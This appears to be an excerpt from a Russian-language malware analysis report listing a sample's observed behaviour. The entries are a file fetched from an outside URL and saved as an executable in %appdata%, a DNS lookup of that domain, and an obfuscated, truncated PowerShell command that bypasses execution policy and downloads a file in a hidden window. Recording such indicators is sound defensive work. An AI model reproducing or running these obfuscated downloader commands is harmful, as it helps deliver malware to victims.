Техническая информация
- http://ltmp.japantimes.pl/file/hon.vfr как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^Ow^E^RS^He^LL.Ex^e -ex^eC^uT^io^NP^o^li^c^Y^ ^BY^pAsS^ ^-^NOpro^f^iLe -WiNd^oW^S^TY^le h^IdDE^N^ (NEW^-Ob^je^CT ^SyS^tE^M.^neT.^W^EB^CLiE^nT).dOwNLoadF^i^L^e('http://ltmp.jap...
- DNS ASK lt##.#apantimes.pl
- '<SYSTEM32>\cmd.exe' /c "p^Ow^E^RS^He^LL.Ex^e -ex^eC^uT^io^NP^o^li^c^Y^ ^BY^pAsS^ ^-^NOpro^f^iLe -WiNd^oW^S^TY^le h^IdDE^N^ (NEW^-Ob^je^CT ^SyS^tE^M.^neT.^W^EB^CLiE^nT).dOwNLoadF^i^L^e('http://ltmp.jap...' (со скрытым окном)